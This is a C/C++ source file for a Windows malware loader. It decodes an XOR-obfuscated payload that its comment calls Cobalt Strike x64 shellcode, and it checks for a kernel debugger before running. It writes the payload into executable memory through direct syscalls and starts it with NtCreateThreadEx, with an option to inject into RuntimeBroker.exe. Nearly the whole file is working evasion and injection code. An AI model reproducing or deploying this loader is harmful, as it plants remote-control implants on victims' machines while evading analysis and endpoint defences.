#include <windows.h>
#include <stdio.h>
#include <tlhelp32.h>
#include "syscalls.h"
#include "connector.h"
#include "kernelmode_antidbg.h"
#define shellcode_size 894

BOOL anti_dbg();
void RunTheShellcode();

int main(int argc, char* argv[]) {


    /*
    // hiding cosole
    HWND hWnd = GetConsoleWindow();
    ShowWindow(hWnd, SW_MINIMIZE);
    ShowWindow(hWnd, SW_HIDE);
    */
   
    
    if (anti_dbg() == true) {
        printf("[MAIN] No dbg was detected running shellcode ... \n");
        RunTheShellcode();
    }
    else {
        printf("Exiting ... \n");
        exit(0);
    }


    return 0;


}


void RunTheShellcode() {

    
    //the x64 shellcode from cobalt strike encoded by our encoder
    const char shellcode[] = "\xb9\xd\xc6\xa1\xb5\xad\x8d\x45\x45\x45\x4\x14\x4\x15\x17\x14\x13\xd\x74\x97\x20\xd\xce\x17\x25\xd\xce\x17\x5d\xd\xce\x17\x65\xd\xce\x37\x15\xd\x4a\xf2\xf\xf\x8\x74\x8c\xd\x74\x85\xe9\x79\x24\x39\x47\x69\x65\x4\x84\x8c\x48\x4\x44\x84\xa7\xa8\x17\x4\x14\xd\xce\x17\x65\xce\x7\x79\xd\x44\x95\x23\xc4\x3d\x5d\x4e\x47\x30\x37\xce\xc5\xcd\x45\x45\x45\xd\xc0\x85\x31\x22\xd\x44\x95\x15\xce\xd\x5d\x1\xce\x5\x65\xc\x44\x95\xa6\x13\xd\xba\x8c\x4\xce\x71\xcd\xd\x44\x93\x8\x74\x8c\xd\x74\x85\xe9\x4\x84\x8c\x48\x4\x44\x84\x7d\xa5\x30\xb4\x9\x46\x9\x61\x4d\x0\x7c\x94\x30\x9d\x1d\x1\xce\x5\x61\xc\x44\x95\x23\x4\xce\x49\xd\x1\xce\x5\x59\xc\x44\x95\x4\xce\x41\xcd\xd\x44\x95\x4\x1d\x4\x1d\x1b\x1c\x1f\x4\x1d\x4\x1c\x4\x1f\xd\xc6\xa9\x65\x4\x17\xba\xa5\x1d\x4\x1c\x1f\xd\xce\x57\xac\xa\xba\xba\xba\x18\x2f\x45\xc\xfb\x32\x2c\x2b\x2c\x2b\x20\x31\x45\x4\x13\xc\xcc\xa3\x9\xcc\xb4\x4\xff\x9\x32\x63\x42\xba\x90\xd\x74\x8c\xd\x74\x97\x8\x74\x85\x8\x74\x8c\x4\x15\x4\x15\x4\xff\x7f\x13\x3c\xe2\xba\x90\xac\xd6\x45\x45\x45\x1f\xd\xcc\x84\x4\xfd\x1d\x45\x45\x45\x8\x74\x8c\x4\x14\x4\x14\x2f\x46\x4\x14\x4\xff\x12\xcc\xda\x83\xba\x90\xae\x3c\x1e\xd\xcc\x84\xd\x74\x97\xc\xcc\x9d\x8\x74\x8c\x17\x2d\x45\x77\x85\xc1\x17\x17\x4\xff\xae\x10\x6b\x7e\xba\x90\xd\xcc\x83\xd\xc6\x86\x15\x2f\x4f\x1a\xd\xcc\xb4\xff\x5a\x45\x45\x45\x2f\x45\x2d\xc5\x76\x45\x45\xc\xcc\xa5\x4\xfc\x41\x45\x45\x45\x4\xff\x30\x3\xdb\xc3\xba\x90\xd\xcc\xb4\xd\xcc\x9f\xc\x82\x85\xba\xba\xba\xba\x8\x74\x8c\x17\x17\x4\xff\x68\x43\x5d\x3e\xba\x90\xc0\x85\x4a\xc0\xd8\x44\x45\x45\xd\xba\x8a\x4a\xc1\xc9\x44\x45\x45\xae\xf6\xac\xa1\x44\x45\x45\xad\xc7\xba\xba\xba\x6a\x6\x36\x31\x76\x45\xf1\x50\xe0\x74\x4\x90\x5e\x8f\xb7\x54\x6e\xa8\xeb\x6e\xaa\xe9\x50\x0\x88\xff\xd5\xe8\x6\x38\xa0\x18\x8e\x25\x90\xd5\x33\xbd\xc4\x2a\x65\x84\xcd\x44\x73\x44\x9\x4\xf6\xb7\xe4\xe6\xb7\x98\x30\x78\x86\x74\x53\xf\x9c\x91\xee\xe0\x84\x36\xa7\xf6\x39\x6c\xe0\x64\xd6\x3c\xbe\x3c\xd2\x4\x44\x45\x10\x36\x20\x37\x68\x4\x22\x20\x2b\x31\x7f\x65\x8\x2a\x3f\x2c\x29\x29\x24\x6a\x70\x6b\x75\x65\x6d\x12\x2c\x2b\x21\x2a\x32\x36\x65\xb\x11\x65\x73\x6b\x74\x7e\x65\x12\xa\x12\x73\x71\x7e\x65\x11\x37\x2c\x21\x20\x2b\x31\x6a\x72\x6b\x75\x7e\x65\x37\x33\x7f\x74\x74\x6b\x75\x6c\x65\x29\x2c\x2e\x20\x65\x2\x20\x26\x2e\x2a\x48\x4f\x45\xb1\x85\x29\xe7\xd9\xe5\x6b\xbf\x28\x1d\x7e\x9f\x73\x40\x59\x75\x23\x57\xfd\x2c\x12\xb5\xd6\xa\xce\x3b\xdf\xbd\x31\x54\x30\x9a\xe4\xf3\x82\xa3\x3f\x1c\x36\x51\xee\x5a\x9f\x80\x15\x9\x3a\xeb\x81\xca\xca\x86\x6e\xdb\x28\x19\xc4\xab\x4c\xf7\xbc\x6e\x6c\xc5\x3a\xbe\xb3\x74\xee\x95\xf9\xb4\x86\x8a\x21\x6c\x25\x41\xb8\x42\xd3\x24\xb8\x23\x8a\x19\x49\xb6\x99\x3e\xa2\xf6\xb7\x28\x2a\xa0\x85\xf9\x98\xb5\x96\x21\x4c\x3d\xe4\x85\x4a\xcd\xbe\xab\xe0\xda\x8c\xfa\x26\xf1\xe2\xac\x44\x47\x95\x63\x5c\x89\x77\xaa\x5b\xcb\xc4\xca\x1e\x89\x69\xc2\x21\x0\x71\xc\xc\x3f\x52\x33\x5d\x65\xfd\x87\x67\x28\x64\xd6\x81\x9f\x29\xb9\x67\x1f\x2e\x14\xab\x92\xb0\xd7\x9a\x74\x58\xf7\x2b\xe9\xb4\x93\x18\x92\x59\x4e\x42\xd6\x3c\xce\x8e\xf6\x30\x9f\xab\x2f\x54\x9c\xad\x12\xf7\xbb\x7b\x11\x2f\x28\x78\xe7\xf4\x5b\x9b\x4b\x83\x70\x1c\xc1\x21\xe6\x81\x6\x50\xa1\xe2\xb1\x95\xc0\x53\x4e\x1a\xc4\xa5\xe1\x45\x4\xfb\xb5\xf0\xe7\x13\xba\x90\xd\x74\x8c\xff\x45\x45\x5\x45\x4\xfd\x45\x55\x45\x45\x4\xfc\x5\x45\x45\x45\x4\xff\x1d\xe1\x16\xa0\xba\x90\xd\xd6\x16\x16\xd\xcc\xa2\xd\xcc\xb4\xd\xcc\x9f\x4\xfd\x45\x65\x45\x45\xc\xcc\xbc\x4\xff\x57\xd3\xcc\xa7\xba\x90\xd\xc6\x81\x65\xc0\x85\x31\xf3\x23\xce\x42\xd\x44\x86\xc0\x85\x30\x92\x1d\x1d\x1d\xd\x40\x45\x45\x45\x45\x15\x86\xad\x3a\xb8\xba\xba\x74\x7c\x77\x6b\x74\x73\x7d\x6b\x74\x73\x6b\x74\x75\x72\x45\x5c\x2c\xe5\xc8";
    //if u want to inject to 'RuntimeBroker.exe' use :
    //int process_id = find();
    int process_id = GetCurrentProcessId();

    HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, process_id);

    if (process) {
        printf("[+] process opened - Handle value is %p\n", process);

        NTSTATUS Status;
        SIZE_T Size = shellcode_size;
        PVOID base_address = NULL;
        PCHAR StartOfBuffer;

        Status = NtAllocateVirtualMemory(process, &base_address, 0, &Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

        printf("[+] Memory Allocated\n");

        if (base_address) {
            printf("[+] Allocated based address is 0x%p\n", base_address);

            int n = 0;

            for (int i = 0; i <= sizeof(shellcode); i++) {

                // Decode shellcode opcode, based on the settings of the encoder :
                char DecodedOpCode = shellcode[i] ^ 0x7a ^ 0xf7 ^ 0x32 ^ 0x05 ^ 0xd8 ^ 0xa3 ^ 0xc7 ^ 0x52 ^ 0x11;
                
          
                Status = NtWriteVirtualMemory(process, LPVOID((ULONG_PTR)base_address + n), &DecodedOpCode, 0x1, NULL);
                if (!Status){
                    printf("[+] Byte 0x%X wrote sucessfully! at 0x%p\n", DecodedOpCode, LPVOID((ULONG_PTR)base_address + n));
                    n++;
                }

            }

            DWORD threadId = 0;

            for (int i = 0; i < 5; i++)
            {
                Sleep(3000);
            }
            
            printf("[+] Running the thread...\n");
            
            HANDLE thread = NULL;
            Status = NtCreateThreadEx(
                &thread,
                THREAD_ALL_ACCESS,
                NULL,
                process,
                (LPTHREAD_START_ROUTINE)base_address,
                NULL,
                NULL,
                NULL,
                NULL,
                NULL,
                NULL
            );
       

            WaitForSingleObject(HANDLE(thread), INFINITE);   
            printf("[+] The thread finished!\n");
        }
        else {
            printf("[+] Unable to allocate memory ..\n");
        }
    }
    else {
        printf("[-] Enable to retrieve process handle\n");
    }
}


BOOL anti_dbg() {

    if (is_kernelmode_dbg_enabled() == KDB_DISABLED) {
        printf("dbg is disabled \n");
        return true;
    }
    else if (is_kernelmode_dbg_enabled() == KDB_LOCAL_ENABLED) {
        printf("local dbg is running ...\n");
        return false;
    }
    else if (is_kernelmode_dbg_enabled() == KDB_REMOTE_ENABLED) {
        printf("remote dbg is running ...\n");
        return false;
    }
    else {
        printf("Unkown state , possibly is_kernelmode_dbg_enabled faild ... \n ");
        return false;
    }

}